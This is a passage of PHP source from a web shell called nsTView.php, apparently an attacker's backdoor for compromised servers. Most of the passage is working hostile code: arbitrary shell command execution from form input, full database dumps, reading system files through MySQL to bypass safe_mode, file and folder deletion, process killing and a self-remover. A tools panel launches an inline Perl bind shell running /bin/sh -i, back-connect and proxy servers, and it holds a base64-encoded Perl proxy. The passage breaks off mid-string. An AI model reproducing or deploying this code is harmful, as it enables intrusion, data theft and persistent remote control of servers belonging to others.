 701 $res = mysql_query("SHOW TABLES FROM $db");
 702 if(mysql_num_rows($res)>0){
 703 while($row=mysql_fetch_row($res)){
 704 $tabs[] .= $row[0];
 705 }
 706 }
 707 }
 708 $fp = fopen($f_d."/".$f,"w");
 709 fwrite($fp, "# nsTView.php v$ver
 710 # Web: http://nst.void.ru
 711 # Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
 712 # MySQL version: ".mysql_get_server_info()."
 713 # PHP version: ".phpversion()."
 714 # Date: ".date("d.m.Y - H:i:s")."
 715 # Dump db ( $db )
 716 # --- eof ---
 717 
 718 ");
 719 foreach($tabs as $tab) {
 720 fwrite($fp,"DROP TABLE IF EXISTS `$tab`;\r\n");
 721 $res = mysql_query("SHOW CREATE TABLE `$tab`");
 722 $row = mysql_fetch_row($res);
 723 $row[1]=str_replace("\n","\r\n",$row[1]);
 724 fwrite($fp, $row[1].";\r\n\r\n");
 725 $res = mysql_query("SELECT * FROM `$tab`");
 726 if(mysql_num_rows($res)>0){
 727 while($row=mysql_fetch_assoc($res)){
 728 $keys = join("`, `", array_keys($row));
 729 $values = array_values($row);
 730 foreach($values as $k=>$v) {$values[$k] = adds2($v);}
 731 $values = join("', '", $values);
 732 $sql = "INSERT INTO `$tab`(`$keys`) VALUES ('$values');\r\n";
 733 fwrite($fp, $sql);
 734 }}
 735 fwrite($fp, "\r\n\r\n\r\n");
 736 }
 737 fclose($fp);
 738 print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
 739 }#end of db dump
 740 
 741 
 742 
 743 
 744 
 745 
 746 $vnutr=$_GET['vnutr'];
 747 $tbl=$_GET['tbl'];
 748 if($vnutr and !$_GET['ins_new_line']){
 749 print "<table cellpadding=0 cellspacing=1><tr><td>";
 750 
 751 mysql_select_db($db) or die(mysql_error());
 752 $c=mysql_query ("SELECT COUNT(*) FROM $tbl");
 753 $cfa=mysql_fetch_array($c);
 754 mysql_free_result($c);
 755 print "
 756 Total: $cfa[0]
 757 <form>
 758 From: <input name=from size=3 value=0>
 759 To: <input name=to size=3 value='$cfa[0]'>
 760 <input type=submit name=show value=Show>
 761 <input type=hidden name=vnutr value=1>
 762 <input type=hidden name=vn value='$vn'>
 763 <input type=hidden name=db value='$db'>
 764 <input type=hidden name=login value='$login'>
 765 <input type=hidden name=pass value='$pass'>
 766 <input type=hidden name=adress value='$adress'>
 767 <input type=hidden name=conn value=1>
 768 <input type=hidden name=baza value=1>
 769 <input type=hidden name=p value=sql>
 770 <input type=hidden name=tbl value='$tbl'>
 771  [<a href='$php_self?getdb=1&to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl'>DOWNLOAD</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&ins_new_line=1'>INSERT</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&dump=1&f_d=$d'>DUMP</a>]
 772 </form></td></tr></table>";
 773 $vn=$_GET['vn'];
 774 $from=$_GET['from'];
 775 $to=$_GET['to'];
 776 $from=$_GET['from'];
 777 $to=$_GET['to'];
 778 if(!isset($from)){$from=0;}
 779 if(!isset($to)){$to=50;}
 780 $query = "SELECT * FROM $vn LIMIT $from,$to";
 781 $result = mysql_query($query);
 782 $result1= mysql_query($query);
 783 print $del_result;
 784 print "<table cellpadding=0 cellspacing=1 border=1><tr><td></td>";
 785 for ($i=0;$i<mysql_num_fields($result);$i++){
 786 $name=mysql_field_name($result,$i);
 787 $type  = mysql_field_type($result, $i);
 788 $len  = mysql_field_len($result, $i);
 789 print "<td bgcolor=#BCE0FF> $name (<b>$type($len)</b>)</td>";
 790 }
 791 print "</tr><pre>";
 792 
 793 while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
 794 foreach($mn as $key=>$inside){
 795 $buffer1 .= "`$key`='".adds($inside)."' AND ";
 796 $b1 .= "<td>".htmlspecialchars($inside, ENT_NOQUOTES)."&nbsp;</td>";
 797 }
 798 $buffer1  = substr($buffer1, 0, strlen($buffer1)-5);
 799 $buffer1  = base64_encode($buffer1);
 800 print "<td>
 801 <form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&vnutr=1&baza=1&vn=$vn&db=$db'>
 802 <input type=hidden name=delete_row value='$buffer1'>
 803 <input type=submit value=Del onclick='return confirm(\"DELETE ?\")' style='border:1px; background-color:white;'>
 804 </form><form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&baza=1&vn=$vn&db=$db'>
 805 <input type=hidden name=edit_row value='$buffer1'>
 806 <input type=submit value=Edit style='border:1px;background-color:green;'>
 807 </form>
 808 </td>\r\n";
 809 print $b1;
 810 print "</tr>";
 811 unset($b1);
 812 unset($buffer1);
 813 }
 814 
 815 
 816 
 817 mysql_free_result($result);
 818 print "</table>";
 819 } #end vnutr
 820 print "</td></tr></table>";
 821 } # end $conn
 822 
 823 
 824 
 825 ####   end of sql
 826 print "</tr></td></table> </td></tr></table>";
 827 print $copyr;
 828 die;
 829 }
 830 
 831 
 832 @$p=$_GET['p'];
 833 if(@$_GET['p']=="selfremover"){
 834         print "<tr><td>";
 835 print "<font color=red face=verdana size=1>Are you sure?<br>
 836 <a href='$php_self?p=yes'>Yes</a> | <a href='$php_self?'>No</a><br>
 837 Remove: <u>";
 838 $path=__FILE__;
 839 print $path;
 840 print " </u>?</td></tr></table>";
 841 die;
 842 }
 843 
 844 if($p=="yes"){
 845 $path=__FILE__;
 846 @unlink($path);
 847 $path=str_replace("\\","/",$path);
 848 if(file_exists($path)){$hmm="NOT DELETED!!!";
 849 print "<tr><td><font color=red>FILE $path NOT DELETED</td></tr>";
 850 }else{$hmm="DELETED";}
 851 print "<script>alert('$path $hmm');</script>";
 852 
 853 }
 854 
 855 
 856 
 857 if($os=="unix"){
 858 function fastcmd(){
 859 global $fast_commands;
 860 $c_f=explode("\n",$fast_commands);
 861 $c_f=count($c_f)-2;
 862 print "
 863 <form method=post>
 864 Total commands: $c_f<br>
 865 <select name=sh3>";
 866 
 867 $c=substr_count($fast_commands," (nst) ");
 868 for($i=0; $i<=$c; $i++){
 869        $expl2=explode("\r\n",$fast_commands);
 870         $expl=explode(" (nst) ",$expl2[$i]);
 871         if(trim($expl[1])!=""){
 872         print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
 873    }
 874 }
 875 
 876 print "</select><br>
 877 <input type=submit value=Exec>
 878 </form>
 879 ";
 880 }
 881 }#end of os unix
 882 
 883 
 884 if($os=="win"){
 885 function fastcmd(){
 886 global $fast_commands_win;
 887 $c_f=explode("\n",$fast_commands_win);
 888 $c_f=count($c_f)-2;
 889 print "
 890 <form method=post>
 891 Total commands: $c_f<br>
 892 <select name=sh3>";
 893 
 894 $c=substr_count($fast_commands_win," (nst) ");
 895 for($i=0; $i<=$c; $i++){
 896        $expl2=explode("\r\n",$fast_commands_win);
 897         $expl=explode(" (nst) ",$expl2[$i]);
 898         if(trim($expl[1])!=""){
 899         print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
 900    }
 901 }
 902 
 903 print "</select><br>
 904 <input type=submit value=Exec>
 905 </form>
 906 ";
 907 }
 908 }#end of os win
 909 
 910 
 911 echo "
 912 <tr><td>";
 913 if(@$_GET['sh311']=="1"){echo "<center>cmd<br>pwd:
 914 ";
 915 chdir($d);
 916 echo getcwd()."<br><br>
 917 Fast cmd:<br>";
 918 fastcmd();
 919 if($os=="win"){$d=str_replace("/","\\\\",$d);}
 920 print "
 921 <a href=\"javascript:cwd('$d ')\">Insert pwd</a>
 922 <form name=sh311Form method=post><input name=sh3 size=110></form></center><br>
 923 ";
 924 if(@$_POST['sh3']){
 925 $sh3=$_POST['sh3'];
 926 echo "<pre>";
 927 print `$sh3`;
 928 echo "</pre>";
 929 }
 930 }
 931 
 932 if(@$_GET['sh311']=="2"){
 933 echo "<center>cmd<br>
 934 pwd:
 935 ";
 936 chdir($d);
 937 echo getcwd()."<br><br>
 938 Fast cmd:<br>";
 939 fastcmd();
 940 if($os=="win"){$d=str_replace("/","\\\\",$d);}
 941 print "
 942 <a href=\"javascript:cwd('$d ')\">Insert pwd</a>
 943 <form name=sh311Form method=post><input name=sh3 size=110></form></center><br>";
 944 if(@$_POST['sh3']){
 945 $sh3=$_POST['sh3'];
 946 echo "<pre>"; print `$sh3`; echo "</pre>";}
 947 echo $copyr;
 948 exit;}
 949 
 950 if(@$_GET['delfl']){
 951 @$delfolder=$_GET['delfolder'];
 952 echo "DELETE FOLDER: <font color=red>".@$_GET['delfolder']."</font><br>
 953 (All files must be writable)<br>
 954 <a href='$php_self?deldir=1&dir=".@$delfolder."&rback=".@$_GET['rback']."'>Yes</a> || <a href='$php_self?d=$d'>No</a><br><br>
 955 ";
 956 echo $copyr;
 957 exit;
 958 }
 959 
 960 
 961 $mkdir=$_GET['mkdir'];
 962 if($mkdir){
 963 print "<br><b>Create Folder in $d :</b><br><br>
 964 <form method=post>
 965 New folder name:<br>
 966 <input name=dir_n size=30>
 967 </form><br>
 968 ";
 969 if($_POST['dir_n']){
 970 mkdir($d."/".$_POST['dir_n']) or die('Cannot create directory '.$_POST['dir_n']);
 971 print "<b><font color=green>Directory created success!</font></b>";
 972 }
 973 print $copyr;
 974 die;
 975 }
 976 
 977 
 978 $mkfile=$_GET['mkfile'];
 979 if($mkfile){
 980 print "<br><b>Create file in $d :</b><br><br>
 981 <form method=post>
 982 File name:<br>
 983 (example: hello.txt , hello.php)<br>
 984 <input name=file_n size=30>
 985 </form><br>
 986 ";
 987 if($_POST['file_n']){
 988 $fp=fopen($d."/".$_POST['file_n'],"w") or die('Cannot create file '.$_POST['file_n']);
 989 fwrite($fp,"");
 990 print "<b><font color=green>File created success!</font></b>";
 991 }
 992 print $copyr;
 993 die;
 994 }
 995 
 996 
 997 $ps_table=$_GET['ps_table'];
 998 if($ps_table){
 999 
1000 if($_POST['kill_p']){
1001 exec("kill -9 ".$_POST['kill_p']);
1002 }
1003 
1004 $str=`ps aux`;
1005 
1006 # You can put here preg_match_all for other distrib/os
1007 preg_match_all("/(?:.*?)([0-9]{1,7})(.*?)\s\s\s[0-9]:[0-9][0-9]\s(.*)/i",$str,$matches);
1008 
1009 
1010 print "<br><b>PS Table :: Fast kill program<br>
1011 (p.s: Tested on Linux slackware 10.0)<br>
1012 <br></b>";
1013 print "<center><table border=1>";
1014 for($i=0; $i<count($matches[3]); $i++){
1015 $expl=explode(" ",$matches[0][$i]);
1016 print "<tr><td>$expl[0]</td><td>PID: ".$matches[1][$i]." :: ".$matches[3][$i]."</td><form method=post><td><font color=red>Kill: <input type=submit name=kill_p value=".trim($matches[1][$i])."></td></form></tr>";
1017 }#end of for
1018 print "</table></center><br><br>";
1019 unset($str);
1020 print $copyr;
1021 die;
1022 }#end of ps table
1023 
1024 
1025 $read_file_safe_mode=$_GET['read_file_safe_mode'];
1026 if($read_file_safe_mode){
1027 
1028 if(!isset($_POST['l'])){$_POST['l']="root";}
1029 
1030 print "<br>
1031 Read file content using MySQL - when <b>safe_mode</b>, <b>open_basedir</b> is <font color=green>ON</font><Br>
1032 <form method=post>
1033 <table>
1034 <tr><td>Addr:</td><Td> <input name=serv_ip value='127.0.0.1'><input name=port value='3306' size=6></td></tr>
1035 <tr><td>Login:</td><td><input name=l value=".$_POST['l']."></td></tr>
1036 <tr><td>Passw:</td><td><input name=p value=".$_POST['p']."></td></tr></table>
1037 (example: /etc/hosts)<br>
1038 <input name=read_file size=45><br>
1039 <input type=submit value='Show content'>
1040 </form>
1041 <br>";
1042 
1043 if($_POST['read_file']){
1044 $read_file=$_POST['read_file'];
1045 @mysql_connect($_POST['serv_ip'].":".$_POST['port'],$_POST['l'],$_POST['p']) or die("<font color=red>".mysql_error()."</font>");
1046 mysql_create_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
1047 mysql_select_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
1048 mysql_query('CREATE TABLE `tmp_file` ( `file` LONGBLOB NOT NULL );') or die("<font color=red>".mysql_error()."</font>");
1049 mysql_query("LOAD DATA INFILE \"".addslashes($read_file)."\" INTO TABLE tmp_file");
1050 $query = "SELECT * FROM tmp_file";
1051 $result = mysql_query($query) or die("<font color=red>".mysql_error()."</font>");
1052 print "<b>File content</b>:<br><br>";
1053 for($i=0;$i<mysql_num_fields($result);$i++){
1054 $name=mysql_field_name($result,$i);}
1055 while($line=mysql_fetch_array($result, MYSQL_ASSOC)){
1056 foreach ($line as $key =>$col_value) {
1057 print htmlspecialchars($col_value)."<br>";}}
1058 mysql_free_result($result);
1059 mysql_drop_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
1060 }
1061 
1062 
1063 print $copyr;
1064 die;
1065 }#end of read_file_safe_mode
1066 
1067 
1068 # sys
1069 $wich_f=$_GET['wich_f'];
1070 $delete=$_GET['delete'];
1071 $del_f=$_GET['del_f'];
1072 $chmod=$_GET['chmod'];
1073 $ccopy_to=$_GET['ccopy_to'];
1074 
1075 
1076 # delete
1077 if(@$_GET['del_f']){
1078 if(!isset($delete)){
1079 print "<font color=red>Delete this file?</font><br>
1080 <b>$d/$wich_f<br><br></b>
1081 <a href='$php_self?d=$d&del_f=$wich_f&delete=1'>Yes</a> / <a href='$php_self?d=$d'>No</a>
1082 ";}
1083 if($delete==1){
1084 unlink($d."/".$del_f);
1085 print "<b>File: <font color=green>$d/$del_f DELETED!</font></b>
1086 <br><b> <a href='$php_self?d=$d'># BACK</a>
1087 ";
1088 }
1089 echo $copyr;
1090 exit;
1091 }
1092 
1093 
1094 # copy to
1095 if($ccopy_to){
1096 $wich_f=$_POST['wich_f'];
1097 $to_f=$_POST['to_f'];
1098 print "<font color=green>Copy file:<br>
1099 $d/$ccopy_to</font><br>
1100 <br>
1101 <form method=post>
1102 File:<br><input name=wich_f size=100 value='$d/$ccopy_to'><br><br>
1103 To:<br><input name=to_f size=100 value='$d/nst_$ccopy_to'><br><br>
1104 <input type=submit value=Copy></form><br><br>
1105 ";
1106 
1107 if($to_f){
1108 @copy($wich_f,$to_f) or die("<font color=red>Cannot copy!!! maybe folder is not writable</font>");
1109 print "<font color=green><b>Copy success!!!</b></font><br>";
1110 }
1111 
1112 echo $copyr;
1113 exit;
1114 }
1115 
1116 
1117 # chmod
1118 if(@$_GET['chmod']){
1119 $perms = @fileperms($d."/".$wich_f);
1120 print "<b><font color=green>CHMOD file $d/$wich_f</font><br>
1121 <br><center>This file chmod is</b> ";
1122 print perm($perms);
1123 print "</center>
1124 <br>";
1125 $chmd=<<<HTML
1126 
1127 <script>
1128 <!--
1129 
1130 function do_chmod(user) {
1131         var field4 = user + "4";
1132         var field2 = user + "2";
1133         var field1 = user + "1";
1134         var total = "t_" + user;
1135         var symbolic = "sym_" + user;
1136         var number = 0;
1137         var sym_string = "";
1138 
1139         if (document.chmod[field4].checked == true) { number += 4; }
1140         if (document.chmod[field2].checked == true) { number += 2; }
1141         if (document.chmod[field1].checked == true) { number += 1; }
1142 
1143         if (document.chmod[field4].checked == true) {
1144                 sym_string += "r";
1145         } else {
1146                 sym_string += "-";
1147         }
1148         if (document.chmod[field2].checked == true) {
1149                 sym_string += "w";
1150         } else {
1151                 sym_string += "-";
1152         }
1153         if (document.chmod[field1].checked == true) {
1154                 sym_string += "x";
1155         } else {
1156                 sym_string += "-";
1157         }
1158 
1159         if (number == 0) { number = ""; }
1160         document.chmod[total].value = number;
1161         document.chmod[symbolic].value = sym_string;
1162 
1163         document.chmod.t_total.value = document.chmod.t_owner.value + document.chmod.t_group.value + document.chmod.t_other.value;
1164         document.chmod.sym_total.value = "-" + document.chmod.sym_owner.value + document.chmod.sym_group.value + document.chmod.sym_other.value;
1165 }
1166 //-->
1167 </script>
1168 
1169 
1170 
1171 <form name="chmod" method=post>
1172 <p><table cellpadding="0" cellspacing="0" border="0" bgcolor="silver"><tr><td width="100%" valign="top"><table width="100%" cellpadding="5" cellspacing="2" border="0"><tr><td width="100%" bgcolor="#008000" align="center" colspan="5"><font color="#ffffff" size="3"><b>CHMOD (File Permissions)</b></font></td></tr>
1173         <tr bgcolor="gray">
1174                 <td align="left"><b>Permission</b></td>
1175                 <td align="center"><b>Owner</b></td>
1176                 <td align="center"><b>Group</b></td>
1177                 <td align="center"><b>Other</b></td>
1178                 <td bgcolor="#dddddd" rowspan="4"> </td>
1179         </tr><tr bgcolor="#dddddd">
1180                 <td align="left" nowrap><b>Read</b></td>
1181                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner4" value="4" onclick="do_chmod('owner')"></td>
1182                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group4" value="4" onclick="do_chmod('group')"></td>
1183                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other4" value="4" onclick="do_chmod('other')"></td>
1184         </tr><tr bgcolor="#dddddd">
1185                 <td align="left" nowrap><b>Write</b></td>
1186                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner2" value="2" onclick="do_chmod('owner')"></td>
1187                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group2" value="2" onclick="do_chmod('group')"></td>
1188                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other2" value="2" onclick="do_chmod('other')"></td>
1189         </tr><tr bgcolor="#dddddd">
1190                 <td align="left" nowrap><b>Execute</b></td>
1191                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner1" value="1" onclick="do_chmod('owner')"></td>
1192                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group1" value="1" onclick="do_chmod('group')"></td>
1193                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other1" value="1" onclick="do_chmod('other')"></td>
1194         </tr><tr bgcolor="#dddddd">
1195                 <td align="right" nowrap>Octal:</td>
1196                 <td align="center"><input type="text" name="t_owner" value="" size="1"></td>
1197                 <td align="center"><input type="text" name="t_group" value="" size="1"></td>
1198                 <td align="center"><input type="text" name="t_other" value="" size="1"></td>
1199                 <td align="left"><b>=</b> <input type="text" name="t_total" value="777" size="3"></td>
1200         </tr><tr bgcolor="#dddddd">
1201                 <td align="right" nowrap>Symbolic:</td>
1202                 <td align="center"><input type="text" name="sym_owner" value="" size="3"></td>
1203                 <td align="center"><input type="text" name="sym_group" value="" size="3"></td>
1204                 <td align="center"><input type="text" name="sym_other" value="" size="3"></td>
1205                 <td align="left" width=100><b>=</b> <input type="text" name="sym_total" value="" size="10"></td>
1206         </tr>
1207 </table></td></tr></table></p>
1208 HTML;
1209 
1210 print "<center>".$chmd."
1211 
1212 <b>$d/$wich_f</b><br><br>
1213 <input type=submit value=CHMOD></form>
1214 </center>
1215 </form>
1216 ";
1217 $t_total=$_POST['t_total'];
1218 if($t_total){
1219 chmod($d."/".$wich_f,$t_total);
1220 print "<center><font color=green><br><b>Now chmod is $t_total</b><br><br></font>";
1221 print "<a href='$php_self?d=$d'># BACK</a><br><br>";
1222 }
1223 echo $copyr;
1224 exit;
1225 }
1226 
1227 # rename
1228 if(@$_GET['rename']){
1229 print "<b><font color=green>RENAME $d/$wich_f ?</b></font><br><br>
1230 <center>
1231 <form method=post>
1232 <b>RENAME</b><br><u>$wich_f</u><br><Br><B>TO</B><br>
1233 <input name=rto size=40 value='$wich_f'><br><br>
1234 <input type=submit value=RENAME>
1235 </form>
1236 ";
1237 
1238 @$rto=$_POST['rto'];
1239 
1240 if($rto){
1241 $fr1=$d."/".$wich_f;
1242 $fr1=str_replace("//","/",$fr1);
1243 $to1=$d."/".$rto;
1244 $to1=str_replace("//","/",$to1);
1245 
1246 rename($fr1,$to1);
1247 print "File <br><b>$wich_f</b><br>Renamed to <b>$rto</b><br><br>";
1248 
1249 echo "<meta http-equiv=\"REFRESH\" content=\"3;URL=".$php_self."?d=".$d."&rename=1&wich_f=".$rto."\">";
1250 
1251 }
1252 
1253 echo $copyr;
1254 exit;
1255 }
1256 
1257 
1258 
1259 
1260 if(@$_GET['deldir']){
1261 @$dir=$_GET['dir'];
1262 function deldir($dir)
1263 {
1264 $handle = @opendir($dir);
1265 while (false!==($ff = @readdir($handle))){
1266 if($ff != "." && $ff != ".."){
1267 if(@is_dir("$dir/$ff")){
1268 deldir("$dir/$ff");
1269 }else{
1270 @unlink("$dir/$ff");
1271 }}}
1272 @closedir($handle);
1273 if(@rmdir($dir)){
1274 @$success = true;}
1275 return @$success;
1276 }
1277 $dir=@$dir;
1278 deldir($dir);
1279 
1280 $rback=$_GET['rback'];
1281 @$rback=explode("/",$rback);
1282 $crb=count($rback);
1283 for($i=0; $i<$crb-1; $i++){
1284         @$x.=$rback[$i]."/";
1285 }
1286 echo "<meta http-equiv=\"REFRESH\" content=\"0;URL='$php_self?d=".@$x."'\">";
1287 echo $copyr;
1288 exit;}
1289 
1290 
1291 if(@$_GET['t']=="tools"){
1292         # unix
1293 if($os=="unix"){
1294 print "
1295 <center><br>
1296 <font color=red><b>P.S: After you Start, your browser may stuck! You must close it, and then run nstview.php again.</b><br></font>
1297 <table border=1>
1298 <tr><td align=center><b>[Name]</td><td align=center><b>[C]</td><td align=center><b>[Port]</td><td align=center><b>[Perl]</td><td align=center><b>[Port]</td><td align=center><b>[Other options, info]</td></tr>
1299 <tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input type=submit name=c_bd value='Start' style='background-color:green;'></td><td><input name=port size=6 value=5545></td></form><form method=post><td><input type=submit name=perl_bd value='Start' style='background-color:green;'></td><td><input name=port value=5551 size=6></td><td>none</td></form></tr>
1300 <tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><input type=submit value='Start' name=bc_c style='background-color:green;'></td><td><input name=port_c size=6 value=5546></td><td><input type=submit value='Start' name=port_p disabled style='background-color:gray;'></td><td><input name=port value=5552 size=6></td><td>b.c. ip: <input name=ip value='".$_SERVER['REMOTE_ADDR']."'> nc -l -p <i>5546</i></td></form></tr>
1301 <tr><form method=post><td><font color=red><b>Datapipe:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port_1 size=6 value=5547></td><td><input type=submit value='Start' name=datapipe_pl style='background-color:green;'></td><td><input name=port_2 value=5553 size=6></td><td>other serv ip: <input name=ip> port: <input name=port_3 value=5051 size=6></td></form></tr>
1302 <tr><form method=post><td><font color=red><b>Web proxy:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5548></td></form><form method=post><td><input type=submit value='Start' name=perl_proxy style='background-color:green;'></td><td><input name=port size=6 value=5554></td></form><td>none</td></tr>
1303 <tr><form method=post><td><font color=red><b>Socks 4 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5549></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5555></td><td>none</td></tr>
1304 <tr><form method=post><td><font color=red><b>Socks 5 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5550></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5556></td><td>none</td></tr>
1305 </table>
1306 </center>
1307 <br><Br>
1308 ";
1309 }#end of unix
1310 
1311 
1312 if($_POST['perl_bd']){
1313 $port=$_POST['port'];
1314 $perl_bd_scp = "
1315 use Socket;\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
1316 setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);bind(S,sockaddr_in(\$p,INADDR_ANY));
1317 listen(S,50);while(1){accept(X,S);if(!(\$pid=fork)){if(!defined \$pid){exit(0);}
1318 open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\");
1319 close X;}}";
1320 
1321 if(is_writable("/tmp")){
1322 $fp=fopen("/tmp/nst_perl_bd.pl","w");
1323 fwrite($fp,"$perl_bd_scp");
1324 passthru("nohup perl /tmp/nst_perl_bd.pl &");
1325 unlink("/tmp/nst_perl_bd.pl");
1326 }else{
1327 if(is_writable(".")){
1328 mkdir(".nst_bd_tmp");
1329 $fp=fopen(".nst_bd_tmp/nst_perl_bd.pl","w");
1330 fwrite($fp,"$perl_bd_scp");
1331 passthru("nohup perl .nst_bd_tmp/nst_perl_bd.pl &");
1332 unlink(".nst_bd_tmp/nst_perl_bd.pl");
1333 rmdir(".nst_bd_tmp");
1334 }
1335 }
1336 $show_ps="1";
1337 }#end of start perl_bd
1338 
1339 if($_POST['perl_proxy']){
1340 $port=$_POST['port'];
1341 $perl_proxy_scp = "IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4vcGVybA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtIGh0dHAgcHJveHkgc2VydmVyLiB6YXB1c2thamVtOiBwZXJsIHByb3h5LnBsCTgxODEgbHVib2ogcG9ydCB2aTZpIDEwMjQtDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KI3JlcXVpcmUgInN5cy9zb2NrZXQucGgiOw0KdXNlIFNvY2tldDsNCnNyYW5kICh0aW1lfHwkJCk7DQojLS0tICBEZWZpbmUgYSBmcmllbmRseSBleGl0IGhhbmRsZXINCiRTSUd7J0tJTEwnfSA9ICRTSUd7UVVJVH0gPSAkU0lHe0lOVH0gPSAnZXhpdF9oYW5kbGVyJzsNCnN1YiBleGl0X2hhbmRsZXIgew0KICAgIHByaW50ICJcblxuIC0tLSBQcm94eSBzZXJ2ZXIgaXMgZHlpbmcgLi4uXG5cbiI7DQogICAgY2xvc2UoU09DS0VUKTsNCiAgICBleGl0Ow0KDQp9DQojLS0tICBTZXR1cCBzb2NrZXQNCg0KJHwgPSAxOw0KJHByb3h5X3BvcnQgPSBzaGlmdChAQVJHVik7DQokcHJveHlfcG9ydCA9IDgxODEgdW5sZXNzICRwcm94eV9wb3J0ID1+IC9cZCsvOw0KDQokc29ja2V0X2Zvcm1hdCA9ICdTIG4gYTQgeDgnOw0KJmxpc3Rlbl90b19wb3J0KFNPQ0tFVCwgJHByb3h5X3BvcnQpOw0KJGxvY2FsX2hvc3QgPSBgaG9zdG5hbWVgOw0KY2hvcCgkbG9jYWxfaG9zdCk7DQokbG9jYWxfaG9zdF9pcCA9IChnZXRob3N0YnluYW1lKCRsb2NhbF9ob3N0KSlbNF07DQpwcmludCAiIC0tLSBQcm94eSBzZXJ2ZXIgcnVubmluZyBvbiAkbG9jYWxfaG9zdCBwb3J0OiAkcHJveHlfcG9ydCBcblxuIjsNCiMtLS0gIExvb3AgZm9yZXZlciB0YWtpbmcgcmVxdWVzdHMgYXMgdGhleSBjb21lDQp3aGlsZSAoMSkgew0KIy0tLSAgV2FpdCBmb3IgcmVxdWVzdA0KICAgIHByaW50ICIgLS0tIFdhaXRpbmcgdG8gYmUgb2Ygc2VydmljZSAuLi5cbiI7DQogICAgKCRhZGRyID0gYWNjZXB0KENISUxELFNPQ0tFVCkpIHx8IGRpZSAiYWNjZXB0ICQhIjsNCiAgICAoJHBvcnQsJGluZXRhZGRyKSA9ICh1bnBhY2soJHNvY2tldF9mb3JtYXQsJGFkZHIpKVsxLDJdOw0KICAgIEBpbmV0YWRkciA9IHVucGFjaygnQzQnLCRpbmV0YWRkcik7DQogICAgcHJpbnQgIkNvbm5lY3Rpb24gZnJvbSAiLCBqb2luKCIuIiwgQGluZXRhZGRyKSwgIiAgcG9ydDogJHBvcnQgXG4iOw0KIy0tLSAgRm9yayBhIHN1YnByb2Nlc3MgdG8gaGFuZGxlIHJlcXVlc3QuDQojLS0tICBQYXJlbnQgcHJvY2VzIGNvbnRpbnVlcyBsaXN0ZW5pbmcuDQogICAgaWYgKGZvcmspIHsNCgl3YWl0OwkJIyBGb3Igbm93IHdlIHdhaXQgZm9yIHRoZSBjaGlsZCB0byBmaW5pc2gNCgluZXh0OwkJIyBXZSB3YWl0IHNvIHRoYXQgcHJpbnRvdXRzIGRvbid0IG1peA0KICAgIH0NCiMtLS0gIFJlYWQgZmlyc3QgbGluZSBvZiByZXF1ZXN0IGFuZCBhbmFseXplIGl0Lg0KIy0tLSAgUmV0dXJuIGFuZCBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QgbWV0aG9kLg0KICAgKCRmaXJzdCwkbWV0aG9kKSA9ICZhbmFseXplX3JlcXVlc3Q7DQojLS0tICBTZW5kIHJlcXVlc3QgdG8gcmVtb3RlIGhvc3QNCiAgICBwcmludCBVUkwgJGZpcnN0Ow0KICAgIHByaW50ICRmaXJzdDsNCiAgICB3aGlsZSAoPENISUxEPikgew0KCXByaW50ICRfOw0KCW5leHQgaWYgKC9Qcm94eS1Db25uZWN0aW9uOi8pOw0KCXByaW50IFVSTCAkXzsNCglsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvKTsNCiAgICB9DQogICAgaWYgKCRtZXRob2QgZXEgIlBPU1QiKSB7DQoJJGRhdGEgPSA8Q0hJTEQ+Ow0KCXByaW50ICRkYXRhOw0KCXByaW50IFVSTCAkZGF0YT